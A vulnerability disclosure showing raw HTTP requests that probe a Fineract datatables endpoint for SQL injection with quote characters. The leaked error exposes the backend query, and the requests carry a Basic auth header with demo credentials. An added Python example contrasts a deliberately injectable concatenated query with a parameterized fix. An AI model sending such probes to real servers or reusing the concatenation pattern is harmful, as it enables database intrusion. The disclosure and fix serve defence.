The last URL path segment (the datatable name passed to /datatables/) appears to be vulnerable to SQL injection: the error response below shows the raw value `dfgh'` placed inside the query's string literal.
Request 1:
GET /fineract-provider/api/v1/datatables/dfgh' HTTP/1.1
Host: dev.mifos.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Fineract-Platform-Tenantid: default
Authorization: Basic bWlmb3M6cGFzc3dvcmQ=
Dnt: 1
Referer: https://dev.mifos.io/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Response 1:
HTTP/1.1 500
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 10 Jul 2023 11:09:49 GMT
Content-Type: application/json
Connection: close
Content-Length: 1487
{"timestamp":1688987389064,"status":500,"error":"Internal Server Error","message":"StatementCallback; bad SQL grammar [select application_table_name, registered_table_name from x_registered_table where exists (select 'f' from m_appuser_role ur join m_role r on r.id = ur.role_id left join m_role_permission rp on rp.role_id = r.id left join m_permission p on p.id = rp.permission_id where ur.appuser_id = 1 and registered_table_name='dfgh'' and (p.code in ('ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_table_name))) order by application_table_name, registered_table_name]; nested exception is java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_tab' at line 1\\n\\nQuery being executed when exception was thrown:\\nselect application_table_name, registered_table_name from x_registered_table where exists (select 'f' from m_appuser_role ur join m_role r on r.id = ur.role_id left join m_role_permission rp on rp.role_id = r.id left join m_permission p on p.id = rp.permission_id where ur.appuser_id = 1 and registered_table_name='dfgh'' and (p.code in ('ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_table_name))) order by application_table_name, registered_table_name\\n\\n","path":"/fineract-provider/api/v1/datatables/dfgh'"}
Request 2:
GET /fineract-provider/api/v1/datatables/dfgh'' HTTP/1.1
Host: dev.mifos.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Fineract-Platform-Tenantid: default
Authorization: Basic bWlmb3M6cGFzc3dvcmQ=
Dnt: 1
Referer: https://dev.mifos.io/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Response 2:
HTTP/1.1 204
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 10 Jul 2023 11:09:56 GMT
Connection: close
X-Notification-Refresh: false
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
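Why the single quote in Request 1 produces a 500 while the doubled quote in Request 2 produces a 204, shown as an added example that is not Fineract's code: the schema, rows and SQLite stand-in for MySQL are constructed. The concatenated form reproduces the report's parse failure for `dfgh'` and silently succeeds for `dfgh''` (a valid escaped quote), while binding the name as a parameter treats both as plain data.

```python
import sqlite3

# Constructed stand-in schema: only the two columns the report's query selects.
# Column types and the sample rows are assumptions, not Fineract's real schema.
SELECT = "select application_table_name, registered_table_name from x_registered_table "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "create table x_registered_table "
        "(application_table_name text, registered_table_name text);"
        "insert into x_registered_table values "
        "('m_client', 'client_extra'), ('m_loan', 'loan_extra');"
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable shape from the report: the path segment is spliced into the SQL text."""
    sql = SELECT + "where registered_table_name='" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, name: str) -> list:
    """Hardened shape: the name is bound as a parameter, so quotes are data, not syntax."""
    sql = SELECT + "where registered_table_name=?"
    return conn.execute(sql, (name,)).fetchall()


def probe(conn: sqlite3.Connection, lookup, name: str):
    """Return 'sql_error' when the statement fails to parse (the 500 in the report),
    otherwise the matching rows (an empty list is the 204 case)."""
    try:
        return lookup(conn, name)
    except sqlite3.Error:
        return "sql_error"


if __name__ == "__main__":
    db = make_db()
    for name in ("dfgh'", "dfgh''"):
        print(repr(name), "concat:", probe(db, lookup_concat, name),
              "param:", probe(db, lookup_param, name))
```

Where the datatable name must later be used as a table identifier, parameters cannot carry it; restrict it to the names this lookup returns instead of splicing it into SQL text.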
